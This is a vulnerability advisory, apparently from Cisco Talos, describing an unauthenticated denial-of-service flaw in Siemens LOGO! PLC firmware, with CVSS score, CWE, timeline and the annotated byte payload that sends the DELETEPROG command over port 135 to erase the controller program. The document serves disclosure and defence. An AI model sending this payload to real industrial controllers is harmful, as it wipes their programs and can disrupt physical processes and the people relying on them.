An exploitable denial of service vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can cause erased information resulting in a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.
Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA
9.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H
CWE-306 - Missing Authentication for Critical Function
Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be control remotely.
The LOGO System program can be completely erased through the TDE service port 135/TCP using the “DELETEPROG” function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts integrity of the device. The Payload used was the following:
Structure of payload message sent:
\x4B\xc0\x01\xe0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag \x00\x00\x00\x00 # Context \x00\x00\x00\x00 # Session \x44\x45\x4c\x45 # DELETEPROG command \x54\x45\x50\x52 \x4f\x47\x00\x00 \x00\x10\x27\x00 # Timeout \x00
We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019).
2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release
Discovered by Alexander Perez-Palma of Cisco Talos and Emanuel Almeida of Cisco Systems, Inc..